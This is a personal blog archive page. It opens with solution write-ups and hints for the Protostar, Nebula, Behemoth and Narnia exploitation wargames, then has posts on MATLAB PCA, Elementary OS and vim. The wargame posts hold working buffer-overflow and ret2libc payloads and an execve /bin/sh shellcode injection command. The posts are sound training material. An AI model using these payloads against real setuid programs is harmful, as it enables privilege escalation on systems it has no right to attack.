Programming through life

Wednesday, September 14, 2016

Exploit Exercises : Protostar Stack Solutions

The exercises deal with basics of Stack Overflow, you can read the following articles to know the basics

Before starting you the terminal given in the VM is obnoxious so I created a SSH forwarding from my local terminal

VBoxManage modifyvm <myserver> --natpf1 "ssh,tcp,,3022,,22"

ssh -p 3022 <user>@172.0.0.1

Stack0

This is the introductory exercise to introduce buffer overflow. Since the buffer size for input is 64 bytes, if you enter a string whose length is more than 64 bytes you are able toe overflow the buffer and rewrite the modified variable.

Stack1

In this case in addition to overflowing the value you have to input a specific value, in little endian format the LSB is stored at the starting addresss

./stack1 $(python -c "print 'a'*64 + '\x64\x63\x62\x61'")

Stack2

In the bash shell you can use the export command to set the environment variable,

export GREENIE=$(python -c "print 'a'*64 + '\x0a\x0d\x0a\x0d")

Stack3

Here, 'fp' is a function pointer. We want to change the address of the fp to that of win() .

objdump -d ./stack3

generates the object file for the executable from where we can find the address of win() .

python -c "print 'a'*64 + '\x24\x84\x04\x08'" > /tmp/stack3

./stack3 < /tmp/stack3

Stack4

From gdb you can find the address of ebp register using
info frame
and find the address of the buffer using

p &buffer

The return address is stored after the %ebp , find the address of win() by using

p win

Now you can create the appropriate payload

Stack5

This exercise requires us to inject shellcode using a payload. You can check that the binary is suid.
https://www.exploit-db.com/exploits/13357/

Stack6

This tutorial covers this exercise very nicely you can read it.

https://exploit.ph/x86-32-linux/2014/08/06/ret2libc-and-rop/

I am going to try a different approach. Here, we are to use the Ret2libc attack with system call

A good tutorial is here https://www.exploit-db.com/docs/17131.pdf ,https://www.exploit-db.com/docs/28553.pdf

Now, I find the address of the system() libc call using

Print system = 0xb7ecffb0

This will not get caught in the if check and will allow the function to return. Now, I need to find the amount of string to overlfow the hte return address of the binary.

80 bytes will get the overflow to work. Now, I need to find the address of the string /bin/bash

0xbffff9ab: "/bin/bash" in the environment variables, I get by searching all the strings in the stack. Somewhere the env variables must be kept.

No I construct my payload to be

python -c "print 'a'*80 + '\xb0\xff\xec\xb7' +'a'*4+ '\xab\xf9\xff\xbf'" > /tmp/680

To avoid the segmentation fault error replace the four 'a' with address of exit system call.

python -c "print 'a'*80 + '\xb0\xff\xec\xb7' + '\xc0\x60\xec\xb7'+ '\xab\xf9\xff\xbf'" > /tmp/680

Here, the address of env variable is not the same when using with binary, so after hit an trial I got the correct address. But still the program exits without spawning the shell

Stack7

Wednesday, August 24, 2016

Exploit-Exercises : Nebula

Here I give hints to solving various levels of the Exploit Excercises Nebula,.

Level00

non-required

Level01
symbolic links, override echo

Level02
env variables

Level03
Cron does not output to stdout.

Level04
Symbolic links

Level05
.backup, tar -xvzf <filename>. ssh key-pair

Level06
/etc/passwd

Level07
webserver, url escaping, input sanitization

Level08
tcpdump,

Level09
system()

Level10
https://en.wikipedia.org/wiki/Time_of_check_to_time_of_use#Examples
nc -kl 18211

Level11

PS. You can find many sources for full solutions. This is just to help yourselves when stuck and yet think about it yourselves.

Saturday, April 30, 2016

Overthewire: Behemoth

Behemoth is the next suggested level after narnia, while it still binary exploitation it does not provide the source code of the challenges. Thus requiring users to read the assembly code.

Behemoth0:
ltrace, strings

Behemoth1:
Shellcode Injections , buffer overflow

export LOGNAME=$(python -c "print '\"' + '\x90'*58 +'\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80\"'") (python -c "print '\x61'*79+ '\xfe\xde\xff\xff'";cat )| ./behemoth1

Behemoth2:
Absolute adressing

Just a comment :
Reading the main code this time we can see that that canary protection has been activated. You can see this using the following code

   0x08048579 <+12>:    mov    %gs:0x14,%eax
   0x0804857f <+18>:    mov    %eax,0x9c(%esp)
   0x08048586 <+25>:    xor    %eax,%eax

   0x08048620 <+179>:    mov    0x9c(%esp),%edx
   0x08048627 <+186>:    xor    %gs:0x14,%edx
   0x0804862e <+193>:    je     0x8048635 <main+200>
   0x08048630 <+195>:    call   0x80483f0 <__stack_chk_fail@plt>

Sunday, April 24, 2016

OvertheWire: Narnia

I realised while solving the challenges is that sometimes you just want a little bit hint and not a complete walkthrough , So I am listing hints for narnia challenges

These challenges are based on C fundamentals and binary exploitation techniques which usually direct implementation in many cases.

Level0 :
DIY

Narnia1:
Shellcode in environment variable

Narnia2:
Buffer Overflow + Shellcode

Narnia3:
Buffer Overflow , symlinks

Narnia4:
No hints for this

Narnia5:
https://www.owasp.org/index.php/Format_string_attack
http://forum.ouah.org/FormatString.PDF

Narnia6:
Function Pointer can be overwritten
https://www.exploit-db.com/docs/28553.pdf

Narnia7:
Format String Vulnerability
ltrace

Narnia8:

If you want more detailed explanation or have any doubts or are stuck somewhere , welcome to comment below.

Tuesday, February 16, 2016

PCA in matlab

Here is a great introduction to PCA for beginners and I can't do better than this Princeton PCA

After reading this I was a bit confused on how to apply this in my matlab code. Let's go through it

    
    [eigenvectors,score,latent] = pca(md);
    md = md * eigenvectors(:,1:10);
    fprintf('Eigenvalues for the data \n');
    disp(latent);

Here md contains my data, suppose that is a matrix of size 10000 x 15 . Now generally I should do some analysis on the variances of eigenvectors before selecting the final dimension that I want. But let's just say that I want 10 .

eigenvectors is a 15 x 15 matrix whose columns are my eigenvectors. Now I project my original data onto the space given by this and get the reduced matrix in md.

Sunday, January 31, 2016

Elementary OS with ASUS zenbook

So I recently bought a Asus Zenbook UX305LA FC004T. It's in the same price range of a macbook air but with higher specs. Lookwise it looks like a macbook air copy and comes with a Windows 10 pre-installed.

But for people like who need a linux distro, elementary OS is the upcoming OS who is taking the world by a storm. You will defintely like its UI and its a good combination with Asus Zenbook.

My reviews with the combinations
1. Battery life is about 8hrs with full charge and moderate use, should be more for windows
2. Speakers are very low volume there are few hacks suggested for this.
3. Screen is good and its pretty lighweight and sturdy, my friend sat on it accidentally , still all is good.

Compared with macbook air which comes in the same price range I don't know how this device would fare, but given the extra 128 gb and extra 4gigs ram this seems the better choice.

Few things that I did to install Elementary OS

After dual booting my PC with Freya, I did the following

sudo apt-get install ubuntu-restricted-extras

Run a sudo apt-get update before and enable the canonical partners repository.

Following tools are a must

Synapse, a semantic serach engine it makes life beautiful when using linux
Elementary Tweaks
Glipper, saves the content of your copyboard
KeePassX, saves the mundane password and the touble of filling them

Monday, January 25, 2016

Becoming better with vim

These are the things that I learn while on my vim journey

Here is good list of articles that you should read, to start with this is an excellent cheat sheet for vim

A Introductory cheatsheet, do this before going to another

http://www.viemu.com/a_vi_vim_graphical_cheat_sheet_tutorial.html

Then these articles are helpful

Moolenar : Good Vim Habits

ctags, is a very good tool for navigating through big projects.

Here is another very good blog about learning vim
http://yannesposito.com/Scratch/en/blog/Learn-Vim-Progressively/

definitely do the above before moving on.

Next steps after learning these shortcuts is having a good .vimrc file, which is basically a configuration file for your vim( stored in the HOME directory). You can search for popular .vimrc on the net. I'll list a few that I find good

Plugins , now as suggested by a friend I started using vundle , which is a vim plugin manager.

NERDTree is a must to have when working on code base.
Cscope is also a needed when working with large code base, refer to the link for setting up Cscope with vim. Also, do the following for automatic cscope.out detection http://vim.wikia.com/wiki/Autoloading_Cscope_Database
Along with NERDTree , you need to learn how to use split screens in vim which is very usefull when working with multiple files. https://www.cs.oberlin.edu/~kuperman/help/vim/windows.html